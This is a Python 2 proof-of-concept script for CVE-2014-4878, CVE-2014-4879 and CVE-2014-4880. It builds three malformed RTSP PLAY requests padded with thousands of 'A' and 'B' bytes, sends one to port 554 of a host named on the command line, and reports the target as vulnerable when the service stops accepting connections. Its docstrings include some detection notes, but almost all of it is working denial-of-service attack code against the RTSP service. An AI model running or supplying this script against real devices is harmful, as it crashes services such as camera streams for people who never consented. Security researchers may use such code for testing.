#!/usr/bin/env python
# coding: utf-8
import sys
import socket
from time import sleep

def cve20144878_poc(host):
    """Build the RTSP PLAY request used as the CVE-2014-4878 probe.

    The headers look ordinary (CSeq, a short Basic credential); the only
    unusual element is the 3200-byte body of ``A`` characters, which matches
    the declared ``Content-length``. A network signature for this probe
    would therefore key on an RTSP PLAY request carrying a large body.

    :param host: value interpolated into the ``rtsp://`` request URI.
    :return: the complete request as a single string.
    """
    body_size = 3200
    pieces = [
        'PLAY rtsp://%s/ RTSP/1.0\r\n' % host,
        'CSeq: 7\r\n',
        'Authorization: Basic AAAAAAA\r\n',
        'Content-length: 3200\r\n\r\n',
        'A' * body_size,  # body length equals the advertised Content-length
    ]
    return ''.join(pieces)

def cve20144879_poc(host):
    """Build the RTSP PLAY request used as the CVE-2014-4879 probe.

    Unlike the other two builders, this request has no ``CSeq`` header and
    no body. Its distinguishing feature is the header *name*:
    ``Authorization`` followed by 1024 ``A`` characters before the colon.
    An RTSP header name of that length does not occur in normal traffic,
    so it is a usable detection point.

    :param host: value interpolated into the ``rtsp://`` request URI.
    :return: the complete request as a single string.
    """
    request_line = 'PLAY rtsp://%s/ RTSP/1.0\r\n' % host
    padded_header_name = 'Authorization' + 'A' * 1024
    header_value = ': Basic AAAAAAA\r\n\r\n'
    return request_line + padded_header_name + header_value

def cve20144880_poc(host):
    """Build the RTSP PLAY request used as the CVE-2014-4880 probe.

    The oversized element here is the Basic credential: 2048 ``A``
    characters in the ``Authorization`` header value. After the blank line
    that ends the headers, 1024 ``B`` characters follow with no
    ``Content-length`` header announcing them.

    :param host: value interpolated into the ``rtsp://`` request URI.
    :return: the complete request as a single string.
    """
    credential = 'A' * 2048
    trailing_data = 'B' * 1024
    return ''.join((
        'PLAY rtsp://%s/ RTSP/1.0\r\n' % host,
        'CSeq: 7\r\n',
        'Authorization: Basic ',
        credential,
        '\r\n\r\n',
        trailing_data,
    ))

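def check_port_on(host):
    """Report whether a TCP connection to the RTSP port (554) succeeds.

    Uses ``connect_ex`` so a refused or unreachable port yields an error
    code rather than an exception. The socket is always closed before
    returning, so the probe leaves no descriptor open.

    :param host: hostname or IPv4 address to probe.
    :return: ``True`` if the connection was accepted, ``False`` otherwise.
    """
    soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # connect_ex returns 0 on success and an errno value on failure.
        return soc.connect_ex((host, 554)) == 0
    finally:
        soc.close()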

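def check_vuln_exists(host, poc):
    """Send one of the three probe requests and infer the result from liveness.

    The verdict rests on a single observation: whether port 554 still
    accepts a TCP connection one second after the request was sent.
    Consequences for anyone interpreting the output:

    * ``True`` means the RTSP service stopped accepting connections, so a
      positive result coincides with a service outage on the device.
    * Any unrelated connect failure on the second attempt (packet loss,
      a firewall or rate limiter reacting to the first connection) is also
      reported as ``True``.
    * A service that is restarted by a watchdog within the one-second wait,
      or that fails later than that, is reported as ``False``.

    :param host: hostname or IPv4 address of the device under test.
    :param poc: ``'1'`` or ``'2'`` select the first or second request
        builder; any other value selects the third.
    :return: ``True`` if the port refused the follow-up connection,
        ``False`` if it accepted it or if the initial connection failed.
    """
    soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        try:
            soc.connect((host, 554))
        except socket.error:
            return False

        if poc == '1':
            payload = cve20144878_poc(host)
        elif poc == '2':
            payload = cve20144879_poc(host)
        else:
            payload = cve20144880_poc(host)

        soc.send(payload)
    finally:
        # Close on every path, including a failed connect or a send error.
        soc.close()

    sleep(1)  # give the service time to fail before re-checking the port
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        probe.connect((host, 554))
    except socket.error:
        return True
    finally:
        # The follow-up socket is only a liveness check; never leave it open.
        probe.close()

    return False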

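if __name__ == '__main__':
    # Command-line entry point: <HOST> <POCn>, where POCn is 1, 2 or 3.
    if len(sys.argv) < 3:
        print '\nUsage: %s <HOST> <POCn>' % sys.argv[0]
        print '\n[-] POC choose'
        print '\t1 ==> CVE-2014-4878'
        print '\t2 ==> CVE-2014-4879'
        print '\t3 ==> CVE-2014-4880'
        sys.exit()

    target = sys.argv[1]
    poc_number = sys.argv[2]
    # Compare against the exact choices. A substring test against '123'
    # would also accept '', '12', '23' and '123', all of which would then
    # silently fall through to the third request.
    if poc_number not in ('1', '2', '3'):
        print 'Choose one POC.'
        sys.exit()

    if check_port_on(target):
        vuln_exists = check_vuln_exists(target, poc_number)
        # The verdict is inferred from port 554 refusing a connection after
        # the request, so "vulnerable" here means the service went down.
        if vuln_exists:
            print 'Target is vulnerable.'
        else:
            print 'Target may not be vulnerable.'
    else:
        print 'RTSP(port 554) closed'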